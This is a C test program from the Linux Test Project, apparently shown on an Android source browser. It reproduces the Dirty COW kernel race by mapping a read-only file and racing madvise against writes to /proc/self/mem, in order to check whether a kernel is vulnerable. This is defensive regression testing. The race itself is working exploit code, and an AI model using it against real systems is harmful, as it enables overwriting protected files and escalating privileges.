Pie  |  9.0.0_r8
C++程序  |  127行  |  3.02 KB 

/*
 * Copyright (c) 2016 Cyril Hrubis <chrubis@suse.cz>
 *  Based on: https://github.com/dirtycow/dirtycow.github.io
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see <http://www.gnu.org/licenses/>.
 */

#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <pwd.h>

#include "tst_safe_pthread.h"
#define TST_NO_DEFAULT_MAIN
#include "tst_test.h"

#define FNAME "test"
#define STR   "this is not a test\n"

static char *str = "m00000000000000000";
static void *map;
static int mfd;

/*
 * You have to race madvise(MADV_DONTNEED) ::
 * https://access.redhat.com/security/vulnerabilities/2706661
 *
 * This is achieved by racing the madvise(MADV_DONTNEED) system call while
 * having the page of the executable mmapped in memory.
 */
static void *madvise_thread(void *arg)
{
	int c = 0;

	(void)arg;

	while (1)
		c += madvise(map, 100, MADV_DONTNEED);

	tst_res(TINFO, "madvise: %i", c);

	return NULL;
}

/*
 * You have to write to /proc/self/mem ::
 * https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
 *
 * The in the wild exploit we are aware of doesn't work on Red Hat Enterprise
 * Linux 5 and 6 out of the box because on one side of the race it writes to
 * /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise
 * Linux 5 and 6.
 */
void *proc_self_mem_thread(void *arg)
{
	int c = 0;

	(void)arg;

	while (1) {
		lseek(mfd, (uintptr_t) map, SEEK_SET);
		c += write(mfd, str, strlen(str));
	}

	tst_res(TINFO, "write: %i", c);

	return NULL;
}

void sighandler(int sig)
{
	(void) sig;

	_exit(0);
}

/*
 * You have to use MAP_PRIVATE for copy-on-write mapping.
 * Create a private copy-on-write mapping. Updates to the
 * mapping are not visible to other processes mapping the same
 * file, and are not carried through to the underlying file. It
 * is unspecified whether changes made to the file after the
 * mmap() call are visible in the mapped region.
 */
int main(void)
{
	pthread_t pth1, pth2;
	int fd;
	struct stat st;

	tst_reinit();

	SAFE_SIGNAL(SIGUSR1, sighandler);
	TST_CHECKPOINT_WAKE(0);

	/* Open it read only and map */
	fd = SAFE_OPEN(FNAME, O_RDONLY);
	SAFE_FSTAT(fd, &st);

	map = SAFE_MMAP(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
	mfd = SAFE_OPEN("/proc/self/mem", O_RDWR);

	/* Try to rewrite it */
	SAFE_PTHREAD_CREATE(&pth1, NULL, madvise_thread, NULL);
	SAFE_PTHREAD_CREATE(&pth2, NULL, proc_self_mem_thread, NULL);

	pause();

	return 0;
}